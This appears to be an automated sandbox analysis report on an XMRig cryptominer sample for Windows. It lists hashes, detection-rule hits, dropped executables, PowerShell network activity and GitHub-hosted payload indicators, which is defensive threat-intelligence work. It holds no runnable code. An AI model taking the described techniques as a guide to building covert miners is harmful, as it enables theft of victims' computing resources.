xmrig | 2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2

Analysis

max time kernel
151s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20240319-en
resource tags

arch:x64arch:x86image:win10v2004-20240319-enlocale:en-usos:windows10-2004-x64system
submitted
25-03-2024 17:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
Size

2.1MB
MD5

77cc4401a536d1a63ec6b5bb02bf3dba
SHA1

d4fffd11d05612a07c569e1c966a74f3cd617ff0
SHA256

2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2
SHA512

7729ec8e8d5a8b4d3fb6f2c10594cce129d16966ecbc166acc39da9956bb22dcd0bcd98927cd934f4a6bfd28bb58196df4d1f2774250f3cf77685594d9ff24be
SSDEEP

49152:Lz071uv4BPMkibTIA5sf6r+WVc2HhG82S5k7c2lcA:NABz

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects executables containing URLs to raw contents of a Github gist 57 IoCs

resource	yara_rule
behavioral2/memory/4308-8-0x00007FF6F72C0000-0x00007FF6F76B2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4792-57-0x00007FF6DAD10000-0x00007FF6DB102000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2248-114-0x00007FF60FA70000-0x00007FF60FE62000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1228-166-0x00007FF65C400000-0x00007FF65C7F2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3892-195-0x00007FF6B3E00000-0x00007FF6B41F2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2020-239-0x00007FF75BDF0000-0x00007FF75C1E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4264-243-0x00007FF613820000-0x00007FF613C12000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/764-235-0x00007FF634830000-0x00007FF634C22000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2856-249-0x00007FF760D10000-0x00007FF761102000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3084-256-0x00007FF647130000-0x00007FF647522000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4436-286-0x00007FF6AA6F0000-0x00007FF6AAAE2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1116-290-0x00007FF6CBE90000-0x00007FF6CC282000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4904-292-0x00007FF66D160000-0x00007FF66D552000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5144-296-0x00007FF622BC0000-0x00007FF622FB2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5176-297-0x00007FF7C69A0000-0x00007FF7C6D92000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5300-300-0x00007FF6E9860000-0x00007FF6E9C52000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5368-301-0x00007FF6420B0000-0x00007FF6424A2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5672-302-0x00007FF605E60000-0x00007FF606252000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5724-303-0x00007FF6AB040000-0x00007FF6AB432000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1980-305-0x00007FF7D23D0000-0x00007FF7D27C2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5332-308-0x00007FF668430000-0x00007FF668822000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4308-309-0x00007FF6F72C0000-0x00007FF6F76B2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5400-311-0x00007FF7540C0000-0x00007FF7544B2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5468-314-0x00007FF6B8200000-0x00007FF6B85F2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5432-313-0x00007FF7C19A0000-0x00007FF7C1D92000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5852-307-0x00007FF604630000-0x00007FF604A22000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5600-321-0x00007FF7748F0000-0x00007FF774CE2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5500-320-0x00007FF7B81D0000-0x00007FF7B85C2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5792-304-0x00007FF7EA180000-0x00007FF7EA572000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5240-299-0x00007FF6CC190000-0x00007FF6CC582000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5628-328-0x00007FF6CD070000-0x00007FF6CD462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5652-329-0x00007FF64B0F0000-0x00007FF64B4E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5696-331-0x00007FF72E6E0000-0x00007FF72EAD2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5760-332-0x00007FF7B45A0000-0x00007FF7B4992000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5820-333-0x00007FF703780000-0x00007FF703B72000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2984-279-0x00007FF797D30000-0x00007FF798122000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5060-272-0x00007FF772820000-0x00007FF772C12000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3212-265-0x00007FF760CB0000-0x00007FF7610A2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4776-259-0x00007FF724230000-0x00007FF724622000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1972-252-0x00007FF7D5290000-0x00007FF7D5682000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2096-250-0x00007FF708BD0000-0x00007FF708FC2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3332-247-0x00007FF738850000-0x00007FF738C42000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/520-231-0x00007FF789CA0000-0x00007FF78A092000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4036-206-0x00007FF6F0990000-0x00007FF6F0D82000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4372-202-0x00007FF751360000-0x00007FF751752000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3456-184-0x00007FF757170000-0x00007FF757562000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4408-175-0x00007FF61EFB0000-0x00007FF61F3A2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2672-169-0x00007FF7226A0000-0x00007FF722A92000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2448-156-0x00007FF7399F0000-0x00007FF739DE2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2960-153-0x00007FF6AFDF0000-0x00007FF6B01E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4316-131-0x00007FF60A010000-0x00007FF60A402000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1360-137-0x00007FF7F6660000-0x00007FF7F6A52000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4952-124-0x00007FF65F880000-0x00007FF65FC72000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4380-96-0x00007FF6D6290000-0x00007FF6D6682000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1668-92-0x00007FF6E75C0000-0x00007FF6E79B2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3824-87-0x00007FF73F940000-0x00007FF73FD32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2240-75-0x00007FF76A6C0000-0x00007FF76AAB2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL

UPX dump on OEP (original entry point) 64 IoCs

resource	yara_rule
behavioral2/memory/1980-0-0x00007FF7D23D0000-0x00007FF7D27C2000-memory.dmp	UPX
behavioral2/files/0x000800000002331b-5.dat	UPX
behavioral2/files/0x000800000002331b-6.dat	UPX
behavioral2/memory/4308-8-0x00007FF6F72C0000-0x00007FF6F76B2000-memory.dmp	UPX
behavioral2/files/0x000800000002331d-11.dat	UPX
behavioral2/files/0x000800000002331d-12.dat	UPX
behavioral2/files/0x000800000002331e-10.dat	UPX
behavioral2/files/0x0009000000023323-33.dat	UPX
behavioral2/files/0x0007000000023326-44.dat	UPX
behavioral2/files/0x0007000000023326-55.dat	UPX
behavioral2/memory/4792-57-0x00007FF6DAD10000-0x00007FF6DB102000-memory.dmp	UPX
behavioral2/files/0x000700000002332c-72.dat	UPX
behavioral2/files/0x000700000002332d-80.dat	UPX
behavioral2/files/0x000700000002332b-85.dat	UPX
behavioral2/files/0x000700000002332e-88.dat	UPX
behavioral2/memory/2248-114-0x00007FF60FA70000-0x00007FF60FE62000-memory.dmp	UPX
behavioral2/files/0x0007000000023335-121.dat	UPX
behavioral2/files/0x0007000000023336-128.dat	UPX
behavioral2/files/0x0007000000023335-133.dat	UPX
behavioral2/files/0x0007000000023338-154.dat	UPX
behavioral2/memory/1228-166-0x00007FF65C400000-0x00007FF65C7F2000-memory.dmp	UPX
behavioral2/files/0x000700000002333f-181.dat	UPX
behavioral2/memory/3892-195-0x00007FF6B3E00000-0x00007FF6B41F2000-memory.dmp	UPX
behavioral2/memory/5208-220-0x00007FF7431E0000-0x00007FF7435D2000-memory.dmp	UPX
behavioral2/memory/2020-239-0x00007FF75BDF0000-0x00007FF75C1E2000-memory.dmp	UPX
behavioral2/memory/4264-243-0x00007FF613820000-0x00007FF613C12000-memory.dmp	UPX
behavioral2/memory/764-235-0x00007FF634830000-0x00007FF634C22000-memory.dmp	UPX
behavioral2/memory/2856-249-0x00007FF760D10000-0x00007FF761102000-memory.dmp	UPX
behavioral2/memory/3084-256-0x00007FF647130000-0x00007FF647522000-memory.dmp	UPX
behavioral2/memory/4436-286-0x00007FF6AA6F0000-0x00007FF6AAAE2000-memory.dmp	UPX
behavioral2/memory/1116-290-0x00007FF6CBE90000-0x00007FF6CC282000-memory.dmp	UPX
behavioral2/memory/4904-292-0x00007FF66D160000-0x00007FF66D552000-memory.dmp	UPX
behavioral2/memory/5144-296-0x00007FF622BC0000-0x00007FF622FB2000-memory.dmp	UPX
behavioral2/memory/5176-297-0x00007FF7C69A0000-0x00007FF7C6D92000-memory.dmp	UPX
behavioral2/memory/5300-300-0x00007FF6E9860000-0x00007FF6E9C52000-memory.dmp	UPX
behavioral2/memory/5368-301-0x00007FF6420B0000-0x00007FF6424A2000-memory.dmp	UPX
behavioral2/memory/5672-302-0x00007FF605E60000-0x00007FF606252000-memory.dmp	UPX
behavioral2/memory/5724-303-0x00007FF6AB040000-0x00007FF6AB432000-memory.dmp	UPX
behavioral2/memory/1980-305-0x00007FF7D23D0000-0x00007FF7D27C2000-memory.dmp	UPX
behavioral2/memory/5332-308-0x00007FF668430000-0x00007FF668822000-memory.dmp	UPX
behavioral2/memory/4308-309-0x00007FF6F72C0000-0x00007FF6F76B2000-memory.dmp	UPX
behavioral2/memory/5400-311-0x00007FF7540C0000-0x00007FF7544B2000-memory.dmp	UPX
behavioral2/memory/5468-314-0x00007FF6B8200000-0x00007FF6B85F2000-memory.dmp	UPX
behavioral2/memory/5432-313-0x00007FF7C19A0000-0x00007FF7C1D92000-memory.dmp	UPX
behavioral2/memory/5852-307-0x00007FF604630000-0x00007FF604A22000-memory.dmp	UPX
behavioral2/memory/5600-321-0x00007FF7748F0000-0x00007FF774CE2000-memory.dmp	UPX
behavioral2/memory/5500-320-0x00007FF7B81D0000-0x00007FF7B85C2000-memory.dmp	UPX
behavioral2/memory/5792-304-0x00007FF7EA180000-0x00007FF7EA572000-memory.dmp	UPX
behavioral2/memory/5240-299-0x00007FF6CC190000-0x00007FF6CC582000-memory.dmp	UPX
behavioral2/memory/5628-328-0x00007FF6CD070000-0x00007FF6CD462000-memory.dmp	UPX
behavioral2/memory/5652-329-0x00007FF64B0F0000-0x00007FF64B4E2000-memory.dmp	UPX
behavioral2/memory/5696-331-0x00007FF72E6E0000-0x00007FF72EAD2000-memory.dmp	UPX
behavioral2/memory/5760-332-0x00007FF7B45A0000-0x00007FF7B4992000-memory.dmp	UPX
behavioral2/memory/5820-333-0x00007FF703780000-0x00007FF703B72000-memory.dmp	UPX
behavioral2/memory/2984-279-0x00007FF797D30000-0x00007FF798122000-memory.dmp	UPX
behavioral2/memory/5060-272-0x00007FF772820000-0x00007FF772C12000-memory.dmp	UPX
behavioral2/memory/3212-265-0x00007FF760CB0000-0x00007FF7610A2000-memory.dmp	UPX
behavioral2/memory/4776-259-0x00007FF724230000-0x00007FF724622000-memory.dmp	UPX
behavioral2/memory/1972-252-0x00007FF7D5290000-0x00007FF7D5682000-memory.dmp	UPX
behavioral2/memory/2096-250-0x00007FF708BD0000-0x00007FF708FC2000-memory.dmp	UPX
behavioral2/memory/3332-247-0x00007FF738850000-0x00007FF738C42000-memory.dmp	UPX
behavioral2/memory/520-231-0x00007FF789CA0000-0x00007FF78A092000-memory.dmp	UPX
behavioral2/memory/5272-224-0x00007FF760680000-0x00007FF760A72000-memory.dmp	UPX
behavioral2/memory/3644-213-0x00007FF6E2540000-0x00007FF6E2932000-memory.dmp	UPX

XMRig Miner payload 57 IoCs

miner

resource	yara_rule
behavioral2/memory/4308-8-0x00007FF6F72C0000-0x00007FF6F76B2000-memory.dmp	xmrig
behavioral2/memory/4792-57-0x00007FF6DAD10000-0x00007FF6DB102000-memory.dmp	xmrig
behavioral2/memory/2248-114-0x00007FF60FA70000-0x00007FF60FE62000-memory.dmp	xmrig
behavioral2/memory/1228-166-0x00007FF65C400000-0x00007FF65C7F2000-memory.dmp	xmrig
behavioral2/memory/3892-195-0x00007FF6B3E00000-0x00007FF6B41F2000-memory.dmp	xmrig
behavioral2/memory/2020-239-0x00007FF75BDF0000-0x00007FF75C1E2000-memory.dmp	xmrig
behavioral2/memory/4264-243-0x00007FF613820000-0x00007FF613C12000-memory.dmp	xmrig
behavioral2/memory/764-235-0x00007FF634830000-0x00007FF634C22000-memory.dmp	xmrig
behavioral2/memory/2856-249-0x00007FF760D10000-0x00007FF761102000-memory.dmp	xmrig
behavioral2/memory/3084-256-0x00007FF647130000-0x00007FF647522000-memory.dmp	xmrig
behavioral2/memory/4436-286-0x00007FF6AA6F0000-0x00007FF6AAAE2000-memory.dmp	xmrig
behavioral2/memory/1116-290-0x00007FF6CBE90000-0x00007FF6CC282000-memory.dmp	xmrig
behavioral2/memory/4904-292-0x00007FF66D160000-0x00007FF66D552000-memory.dmp	xmrig
behavioral2/memory/5144-296-0x00007FF622BC0000-0x00007FF622FB2000-memory.dmp	xmrig
behavioral2/memory/5176-297-0x00007FF7C69A0000-0x00007FF7C6D92000-memory.dmp	xmrig
behavioral2/memory/5300-300-0x00007FF6E9860000-0x00007FF6E9C52000-memory.dmp	xmrig
behavioral2/memory/5368-301-0x00007FF6420B0000-0x00007FF6424A2000-memory.dmp	xmrig
behavioral2/memory/5672-302-0x00007FF605E60000-0x00007FF606252000-memory.dmp	xmrig
behavioral2/memory/5724-303-0x00007FF6AB040000-0x00007FF6AB432000-memory.dmp	xmrig
behavioral2/memory/1980-305-0x00007FF7D23D0000-0x00007FF7D27C2000-memory.dmp	xmrig
behavioral2/memory/5332-308-0x00007FF668430000-0x00007FF668822000-memory.dmp	xmrig
behavioral2/memory/4308-309-0x00007FF6F72C0000-0x00007FF6F76B2000-memory.dmp	xmrig
behavioral2/memory/5400-311-0x00007FF7540C0000-0x00007FF7544B2000-memory.dmp	xmrig
behavioral2/memory/5468-314-0x00007FF6B8200000-0x00007FF6B85F2000-memory.dmp	xmrig
behavioral2/memory/5432-313-0x00007FF7C19A0000-0x00007FF7C1D92000-memory.dmp	xmrig
behavioral2/memory/5852-307-0x00007FF604630000-0x00007FF604A22000-memory.dmp	xmrig
behavioral2/memory/5600-321-0x00007FF7748F0000-0x00007FF774CE2000-memory.dmp	xmrig
behavioral2/memory/5500-320-0x00007FF7B81D0000-0x00007FF7B85C2000-memory.dmp	xmrig
behavioral2/memory/5792-304-0x00007FF7EA180000-0x00007FF7EA572000-memory.dmp	xmrig
behavioral2/memory/5240-299-0x00007FF6CC190000-0x00007FF6CC582000-memory.dmp	xmrig
behavioral2/memory/5628-328-0x00007FF6CD070000-0x00007FF6CD462000-memory.dmp	xmrig
behavioral2/memory/5652-329-0x00007FF64B0F0000-0x00007FF64B4E2000-memory.dmp	xmrig
behavioral2/memory/5696-331-0x00007FF72E6E0000-0x00007FF72EAD2000-memory.dmp	xmrig
behavioral2/memory/5760-332-0x00007FF7B45A0000-0x00007FF7B4992000-memory.dmp	xmrig
behavioral2/memory/5820-333-0x00007FF703780000-0x00007FF703B72000-memory.dmp	xmrig
behavioral2/memory/2984-279-0x00007FF797D30000-0x00007FF798122000-memory.dmp	xmrig
behavioral2/memory/5060-272-0x00007FF772820000-0x00007FF772C12000-memory.dmp	xmrig
behavioral2/memory/3212-265-0x00007FF760CB0000-0x00007FF7610A2000-memory.dmp	xmrig
behavioral2/memory/4776-259-0x00007FF724230000-0x00007FF724622000-memory.dmp	xmrig
behavioral2/memory/1972-252-0x00007FF7D5290000-0x00007FF7D5682000-memory.dmp	xmrig
behavioral2/memory/2096-250-0x00007FF708BD0000-0x00007FF708FC2000-memory.dmp	xmrig
behavioral2/memory/3332-247-0x00007FF738850000-0x00007FF738C42000-memory.dmp	xmrig
behavioral2/memory/520-231-0x00007FF789CA0000-0x00007FF78A092000-memory.dmp	xmrig
behavioral2/memory/4036-206-0x00007FF6F0990000-0x00007FF6F0D82000-memory.dmp	xmrig
behavioral2/memory/4372-202-0x00007FF751360000-0x00007FF751752000-memory.dmp	xmrig
behavioral2/memory/3456-184-0x00007FF757170000-0x00007FF757562000-memory.dmp	xmrig
behavioral2/memory/4408-175-0x00007FF61EFB0000-0x00007FF61F3A2000-memory.dmp	xmrig
behavioral2/memory/2672-169-0x00007FF7226A0000-0x00007FF722A92000-memory.dmp	xmrig
behavioral2/memory/2448-156-0x00007FF7399F0000-0x00007FF739DE2000-memory.dmp	xmrig
behavioral2/memory/2960-153-0x00007FF6AFDF0000-0x00007FF6B01E2000-memory.dmp	xmrig
behavioral2/memory/4316-131-0x00007FF60A010000-0x00007FF60A402000-memory.dmp	xmrig
behavioral2/memory/1360-137-0x00007FF7F6660000-0x00007FF7F6A52000-memory.dmp	xmrig
behavioral2/memory/4952-124-0x00007FF65F880000-0x00007FF65FC72000-memory.dmp	xmrig
behavioral2/memory/4380-96-0x00007FF6D6290000-0x00007FF6D6682000-memory.dmp	xmrig
behavioral2/memory/1668-92-0x00007FF6E75C0000-0x00007FF6E79B2000-memory.dmp	xmrig
behavioral2/memory/3824-87-0x00007FF73F940000-0x00007FF73FD32000-memory.dmp	xmrig
behavioral2/memory/2240-75-0x00007FF76A6C0000-0x00007FF76AAB2000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	4120	powershell.exe
11	4120	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
4308	VQhzYLU.exe
520	MIxuEeZ.exe
4792	qOxHGRl.exe
2240	EgekirA.exe
3824	AHKWICO.exe
1668	xglSaKX.exe
4380	jKtNRzz.exe
764	faeiEJO.exe
2248	BryYmUh.exe
4952	NptZxSx.exe
4316	pTUwNVA.exe
2020	THlDxVF.exe
1360	BZGElAe.exe
4264	odFyyPt.exe
3332	DZaunJn.exe
2856	AElvxZK.exe
2960	demwdMM.exe
2448	belcULm.exe
1228	xuJRpOC.exe
2672	yZymcXo.exe
2096	zHnaEgZ.exe
4408	stHVgUF.exe
1972	LzrhaJg.exe
3084	fiTcALc.exe
4776	Psprwij.exe
3456	ebJyWAN.exe
3892	DEMSaRF.exe
3212	hTViGSj.exe
5060	soaaCPH.exe
2984	Pulfaqj.exe
4436	iItOukT.exe
4372	ClrqzoO.exe
1116	UkTeaTL.exe
4036	WxgWerp.exe
4904	qfSGFZY.exe
3644	YEnEcMY.exe
5144	XRUFcrZ.exe
5176	iUyCkeN.exe
5208	CVLPPEZ.exe
5240	mZwtqcc.exe
5272	JibOGuN.exe
5300	VnpBUHn.exe
5332	csqlyvw.exe
5368	gZfdICr.exe
5400	xzGJBGq.exe
5432	RtAKCTY.exe
5468	scFloOp.exe
5500	kOpDDoU.exe
5600	tKLCMwu.exe
5628	BGpABCN.exe
5652	uUBosll.exe
5672	QvvqZVs.exe
5696	iSNgRYw.exe
5724	OCrhylU.exe
5760	aRppIEr.exe
5792	LlbvlTo.exe
5820	WpZOQUf.exe
5852	hllLguw.exe
5880	tleYVpa.exe
5912	JqdwzDl.exe
5224	RpUCouu.exe
760	xfImvcv.exe
5324	vpQpURN.exe
5364	dHfXDII.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1980-0-0x00007FF7D23D0000-0x00007FF7D27C2000-memory.dmp	upx
behavioral2/files/0x000800000002331b-5.dat	upx
behavioral2/files/0x000800000002331b-6.dat	upx
behavioral2/memory/4308-8-0x00007FF6F72C0000-0x00007FF6F76B2000-memory.dmp	upx
behavioral2/files/0x000800000002331d-11.dat	upx
behavioral2/files/0x000800000002331d-12.dat	upx
behavioral2/files/0x000800000002331e-10.dat	upx
behavioral2/files/0x0009000000023323-33.dat	upx
behavioral2/files/0x0007000000023326-44.dat	upx
behavioral2/files/0x0007000000023326-55.dat	upx
behavioral2/memory/4792-57-0x00007FF6DAD10000-0x00007FF6DB102000-memory.dmp	upx
behavioral2/files/0x000700000002332c-72.dat	upx
behavioral2/files/0x000700000002332d-80.dat	upx
behavioral2/files/0x000700000002332b-85.dat	upx
behavioral2/files/0x000700000002332e-88.dat	upx
behavioral2/memory/2248-114-0x00007FF60FA70000-0x00007FF60FE62000-memory.dmp	upx
behavioral2/files/0x0007000000023335-121.dat	upx
behavioral2/files/0x0007000000023336-128.dat	upx
behavioral2/files/0x0007000000023335-133.dat	upx
behavioral2/files/0x0007000000023338-154.dat	upx
behavioral2/memory/1228-166-0x00007FF65C400000-0x00007FF65C7F2000-memory.dmp	upx
behavioral2/files/0x000700000002333f-181.dat	upx
behavioral2/memory/3892-195-0x00007FF6B3E00000-0x00007FF6B41F2000-memory.dmp	upx
behavioral2/memory/5208-220-0x00007FF7431E0000-0x00007FF7435D2000-memory.dmp	upx
behavioral2/memory/2020-239-0x00007FF75BDF0000-0x00007FF75C1E2000-memory.dmp	upx
behavioral2/memory/4264-243-0x00007FF613820000-0x00007FF613C12000-memory.dmp	upx
behavioral2/memory/764-235-0x00007FF634830000-0x00007FF634C22000-memory.dmp	upx
behavioral2/memory/2856-249-0x00007FF760D10000-0x00007FF761102000-memory.dmp	upx
behavioral2/memory/3084-256-0x00007FF647130000-0x00007FF647522000-memory.dmp	upx
behavioral2/memory/4436-286-0x00007FF6AA6F0000-0x00007FF6AAAE2000-memory.dmp	upx
behavioral2/memory/1116-290-0x00007FF6CBE90000-0x00007FF6CC282000-memory.dmp	upx
behavioral2/memory/4904-292-0x00007FF66D160000-0x00007FF66D552000-memory.dmp	upx
behavioral2/memory/5144-296-0x00007FF622BC0000-0x00007FF622FB2000-memory.dmp	upx
behavioral2/memory/5176-297-0x00007FF7C69A0000-0x00007FF7C6D92000-memory.dmp	upx
behavioral2/memory/5300-300-0x00007FF6E9860000-0x00007FF6E9C52000-memory.dmp	upx
behavioral2/memory/5368-301-0x00007FF6420B0000-0x00007FF6424A2000-memory.dmp	upx
behavioral2/memory/5672-302-0x00007FF605E60000-0x00007FF606252000-memory.dmp	upx
behavioral2/memory/5724-303-0x00007FF6AB040000-0x00007FF6AB432000-memory.dmp	upx
behavioral2/memory/1980-305-0x00007FF7D23D0000-0x00007FF7D27C2000-memory.dmp	upx
behavioral2/memory/5332-308-0x00007FF668430000-0x00007FF668822000-memory.dmp	upx
behavioral2/memory/4308-309-0x00007FF6F72C0000-0x00007FF6F76B2000-memory.dmp	upx
behavioral2/memory/5400-311-0x00007FF7540C0000-0x00007FF7544B2000-memory.dmp	upx
behavioral2/memory/5468-314-0x00007FF6B8200000-0x00007FF6B85F2000-memory.dmp	upx
behavioral2/memory/5432-313-0x00007FF7C19A0000-0x00007FF7C1D92000-memory.dmp	upx
behavioral2/memory/5852-307-0x00007FF604630000-0x00007FF604A22000-memory.dmp	upx
behavioral2/memory/5600-321-0x00007FF7748F0000-0x00007FF774CE2000-memory.dmp	upx
behavioral2/memory/5500-320-0x00007FF7B81D0000-0x00007FF7B85C2000-memory.dmp	upx
behavioral2/memory/5792-304-0x00007FF7EA180000-0x00007FF7EA572000-memory.dmp	upx
behavioral2/memory/5240-299-0x00007FF6CC190000-0x00007FF6CC582000-memory.dmp	upx
behavioral2/memory/5628-328-0x00007FF6CD070000-0x00007FF6CD462000-memory.dmp	upx
behavioral2/memory/5652-329-0x00007FF64B0F0000-0x00007FF64B4E2000-memory.dmp	upx
behavioral2/memory/5696-331-0x00007FF72E6E0000-0x00007FF72EAD2000-memory.dmp	upx
behavioral2/memory/5760-332-0x00007FF7B45A0000-0x00007FF7B4992000-memory.dmp	upx
behavioral2/memory/5820-333-0x00007FF703780000-0x00007FF703B72000-memory.dmp	upx
behavioral2/memory/2984-279-0x00007FF797D30000-0x00007FF798122000-memory.dmp	upx
behavioral2/memory/5060-272-0x00007FF772820000-0x00007FF772C12000-memory.dmp	upx
behavioral2/memory/3212-265-0x00007FF760CB0000-0x00007FF7610A2000-memory.dmp	upx
behavioral2/memory/4776-259-0x00007FF724230000-0x00007FF724622000-memory.dmp	upx
behavioral2/memory/1972-252-0x00007FF7D5290000-0x00007FF7D5682000-memory.dmp	upx
behavioral2/memory/2096-250-0x00007FF708BD0000-0x00007FF708FC2000-memory.dmp	upx
behavioral2/memory/3332-247-0x00007FF738850000-0x00007FF738C42000-memory.dmp	upx
behavioral2/memory/520-231-0x00007FF789CA0000-0x00007FF78A092000-memory.dmp	upx
behavioral2/memory/5272-224-0x00007FF760680000-0x00007FF760A72000-memory.dmp	upx
behavioral2/memory/3644-213-0x00007FF6E2540000-0x00007FF6E2932000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	raw.githubusercontent.com
8	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\tRxdiaO.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\NUhPKbd.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\rgRnXMc.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\wOtiHXc.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\yiysSXq.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\xvlcJTY.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\ApHmafY.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\CpxRlaT.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\sFCcDjj.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
File created	C:\Windows\System\nVcsTRw.exe	2a891860e0f0dcc54f596dae62e30acbc7a7e765c46673e74fd29f493524aec2.exe
